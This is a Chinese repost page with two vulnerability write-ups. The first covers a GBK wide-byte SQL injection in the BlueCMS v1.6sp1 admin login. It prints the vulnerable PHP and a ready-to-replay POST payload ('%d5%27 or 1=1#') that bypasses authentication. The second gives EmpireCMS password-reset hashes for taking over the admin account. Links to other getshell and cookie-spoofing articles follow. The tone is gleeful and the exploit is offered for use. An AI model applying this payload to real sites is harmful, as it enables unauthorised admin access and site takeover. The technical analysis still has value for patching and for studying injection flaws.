欢迎来到千学网!
您现在的位置:首页 > 实用文 > 其他范文

bluecms版本双字节密码进后台漏洞预警

时间:2023-03-30 08:07:00 其他范文 收藏本文 下载本文

以下是小编为大家准备的bluecms版本双字节密码进后台漏洞预警,本文共2篇,仅供参考,大家一起来看看吧。

bluecms版本双字节密码进后台漏洞预警

篇1:bluecms版本双字节密码进后台漏洞预警

简要描述:

bluecms最新版本即v1.6sp1,处理登录验证时对变量进行单引号转义,但可以用gbk 双字节编码闭合单引号再注释从而进入后台

详细说明:

bluecms验证登录代码如下

function check_admin($name, $pwd)

{

global $db;

$row = $db->getone(“SELECT COUNT(*) AS num FROM ”.table('admin').“ WHERE admin_name='$name' and pwd = md5('$pwd')”);

if($row['num'] >0)

{

return true;

}

else

{

return false;

}

}

且变量进入check_admin函数前已被转义一次,无论MAGIC魔术棒是否开启

if(!get_magic_quotes_gpc)

{

$_POST = deep_addslashes($_POST);

$_GET = deep_addslashes($_GET);

$_COOKIES = deep_addslashes($_COOKIES);

但问题出在这句上

if($this->dbversion() >'4.1'){

mysql_query( “SET NAMES gbk”);

if($this->dbversion() >'5.0.1'){

mysql_query(“SET sql_mode = ''”,$this->linkid);

}

邪恶地笑了

打开后台登录,并准备抓包

用户名和密码随便输 比如jianren jianren

抓到的post变量为 admin_name=jianren&admin_pwd=jianren&submit=%B5%C7%C2%BC&act=do_login

修改为admin_name=jianren%d5%27%20or%201%3d1%23&admin_pwd=jianren&submit=%B5%C7%C2%BC&act=do_login

漏洞证明:

然后重放 芝麻开门

篇2:帝国CMS后台密码重置漏洞漏洞预警

5.0及以前版本:用phpmyadmin修改phome_enewsuser表,把password字段的值设为:e10adc3949ba59abbe56e057f20f883e

密码就是:123456

5.1版本:用phpmyadmin修改phome_enewsuser表里的记录:把password字段的值设为:“322d3fef02fc39251436cb4522d29a71”;把salt字段的值设为:“abc”.

密码就是:123456

天天团购后台Getshell安全问题漏洞预警

马克斯CMScookies注入漏洞漏洞预警

淘客帝国系统后台cookie欺骗漏洞及后台拿shell漏洞预警

Apple QuickTime信息泄露漏洞漏洞预警

iShowMusic V1.2 写入shell漏洞漏洞预警

在线支付逻辑漏洞总结漏洞预警

elasticsearch 漏洞利用工具套装漏洞预警

渗透底层路由技术漏洞预警

优酷开放平台存储型XSS脚本攻击漏洞成功劫持后台漏洞预警

教你进后台简单拿webshell

《bluecms版本双字节密码进后台漏洞预警(精选2篇).doc》
将本文的Word文档下载到电脑,方便收藏和打印
推荐度:
点击下载文档

文档为doc格式

最新推荐
猜你喜欢
点击下载本文文档